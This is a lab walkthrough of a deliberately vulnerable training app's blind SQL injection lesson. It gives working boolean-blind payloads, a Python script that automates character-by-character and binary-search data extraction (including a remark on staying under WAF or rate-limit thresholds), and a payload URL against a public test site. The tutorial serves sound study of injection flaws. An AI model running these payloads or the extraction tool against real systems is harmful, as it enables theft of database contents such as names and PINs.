OwaspBWA - Blind String SQL Injection

Injection Flaws - Blind String SQL Injection


The goal is to find the value of the
field : name in
table : pins
for the row with the cc_number of 4321432143214321.

*The field is of type varchar, which is a string.

  • Try input a single quote (')
Result = Unexpected end of command in statement
[SELECT * FROM user_data WHERE userid = ']
The error message leaks the query itself: the input is concatenated, unquoted, into a numeric comparison.

  • Try ORDER BY 8 : returns fail !   (number of columns is 7)
  • But UNION SELECT does not work here: the lesson is blind (only a valid/invalid response), so there is no output in which to read a UNION result.

  • Try input  : 101 and 1=1 : returns true  <<< Vulnerability !
                101 and 1=2 : returns false



Injection Query
101 AND 1=((SELECT name FROM pins WHERE cc_number='4321432143214321')=String)
But this does not work: it is not possible to guess the whole name in a single comparison (each request only answers one true/false question), so we have to check it one character at a time.


This injection works ($ is the candidate ASCII code; iterate it until the response is true):
&account_number=101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM pins WHERE cc_number=4321432143214321)=$--


Reference ASCII values : 'A' = 65  'Z' = 90   |   'a' = 97 'z' = 122
String       : a-z A-Z
CharCode : Min = 65 / Max = 122   (the range to iterate if the name is letters only; codes 91-96 are punctuation and can be skipped)


101 AND (SELECT ASCII(SUBSTR(name,0,1)) FROM pins WHERE cc_number=4321432143214321)=74--

101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM pins WHERE cc_number=4321432143214321)=105--

101 AND (SELECT ASCII(SUBSTR(name,2,1)) FROM pins WHERE cc_number=4321432143214321)=108--

101 AND (SELECT ASCII(SUBSTR(name,3,1)) FROM pins WHERE cc_number=4321432143214321)=108--


74 , 105 , 108 , 108  =  Jill

Note on the offsets: the queries above start at SUBSTR(name,0,1) and get 'J', while the template before them uses SUBSTR(name,1,1) for the first character. SUBSTR is 1-based in standard SQL, so check which offset returns the first character on the target (and which returns nothing) before reading off the result, otherwise the string comes out shifted by one.





*note

Blind Numeric SQL Injection (pin extracted one digit at a time)
101 AND 1=((SELECT ASCII(substr(pin,0,1)) 
FROM pins 
WHERE cc_number = '1111222233334444')=$)--+


Blind String SQL Injection
101 AND 1=((SELECT ASCII(substr(name,3,1)) 
FROM pins 
WHERE cc_number=4321432143214321)=$)--+


In the numeric case there is another option: iterate from 1 to 1000 (or whatever range applies) and compare the pin directly,
so there is no substr and ASCII comparison to worry about .... just loop through the whole range.

101 AND 1=((SELECT pin
FROM pins WHERE cc_number ='1111222233334444')=$)--+
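The per-character extraction of the name and the numeric note here are the same boolean oracle asked different questions, and both are tedious to do by hand. The script below is an added example (not code from this page, from WebGoat or from OwaspBWA) that automates both: it reproduces the page's linear "=" scan over codes 65..122, then replaces it with a binary search on ">" that needs about eight requests per character instead of up to 58, and bisects the pin directly instead of counting up from 1. The vulnerable query, the user_data/pins tables, their rows (apart from the name Jill, which the page recovered) and the ASCII() function registered on SQLite are all constructed so that it runs offline; Oracle.ask is where a real client would send the payload as account_number and map the page's response to true/false.

```python
"""Automated boolean-blind extraction, string and numeric, against a constructed oracle."""
import sqlite3

TARGET_CC = "4321432143214321"   # row named in the lesson text
PIN_CC = "1111222233334444"      # row used in the page's numeric note


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the lesson's database (assumed shape, not WebGoat's schema)."""
    con = sqlite3.connect(":memory:")
    # HSQLDB provides ASCII(); SQLite does not, so register one. It returns NULL for '',
    # which is what SUBSTR yields past the end of the string.
    con.create_function("ASCII", 1, lambda s: ord(s[0]) if s else None)
    # 'Jill' is the name the page recovered; both pins and the name 'Jane' are constructed.
    con.executescript("""
        CREATE TABLE user_data (userid INTEGER, first_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe');
        CREATE TABLE pins (cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('4321432143214321', 1234, 'Jill');
        INSERT INTO pins VALUES ('1111222233334444', 2468, 'Jane');
    """)
    return con


class Oracle:
    """The vulnerable endpoint: input is concatenated into the query the error message leaked.
    Against a live target, ask() would send the payload as account_number and return True
    when the page shows the 'true' response. requests counts how many times we asked."""

    def __init__(self, con: sqlite3.Connection) -> None:
        self.con = con
        self.requests = 0

    def ask(self, injected: str) -> bool:
        self.requests += 1
        sql = "SELECT * FROM user_data WHERE userid = " + injected
        return len(self.con.execute(sql).fetchall()) > 0


def char_payload(pos: int, op: str, value: int, cc: str = TARGET_CC) -> str:
    """The page's working payload, generalised to any position and comparison operator."""
    return (f"101 AND (SELECT ASCII(SUBSTR(name,{pos},1)) FROM pins "
            f"WHERE cc_number={cc}){op}{value}--")


def extract_string_linear(oracle: Oracle, cc: str = TARGET_CC, max_len: int = 32) -> str:
    """The page's method: try '=' for every code 65..122 at each position, stop at the first miss."""
    out = ""
    for pos in range(1, max_len + 1):
        hit = next((c for c in range(65, 123) if oracle.ask(char_payload(pos, "=", c, cc))), None)
        if hit is None:           # nothing matched: past the end of the name (or not a letter)
            break
        out += chr(hit)
    return out


def extract_string_binary(oracle: Oracle, cc: str = TARGET_CC, max_len: int = 32) -> str:
    """Bisect on '>' over printable ASCII 32..126 (assumption: printable names only)."""
    out = ""
    for pos in range(1, max_len + 1):
        # Past the end ASCII() is NULL and every comparison is false, so one probe ends the loop.
        if not oracle.ask(char_payload(pos, ">", 31, cc)):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(char_payload(pos, ">", mid, cc)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def extract_number_binary(oracle: Oracle, cc: str = PIN_CC, lo: int = 0, hi: int = 9999) -> int:
    """Numeric column: compare the value itself (no SUBSTR/ASCII) but bisect the range
    instead of counting up from 1. Assumption: the pin lies within [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"101 AND (SELECT pin FROM pins WHERE cc_number='{cc}')>{mid}--"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def run_demo() -> dict:
    """Run all three extractions against fresh oracles; returns label -> (value, requests)."""
    con = build_db()
    results = {}
    for label, fn in (("linear", extract_string_linear),
                      ("binary", extract_string_binary),
                      ("pin", extract_number_binary)):
        o = Oracle(con)
        results[label] = (fn(o), o.requests)
    return results


if __name__ == "__main__":
    for label, (value, n) in run_demo().items():
        print(f"{label:>6}: {value!r} in {n} requests")
```

The request counter is the point of the comparison: the linear scan spends 197 requests on "Jill" (10 + 41 + 44 + 44 to find the four letters, then 58 misses to learn the string has ended), the bisection spends about 33. On a real target the same counter is what a WAF or rate limit sees, so fewer, well-placed questions matter as much as the answer.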


Example
For anyone who is studying this but has not installed OwaspBWA yet,
enjoy the "trial and error"; it is the best way to understand it.

http://webscantest.com/datastore/search_get_by_id.php?id=3+and+1=(select+ascii(substr(database(),1,1))=115)--+
(the same technique against a MySQL target: the response is true if the first character of database() is 's', ASCII 115)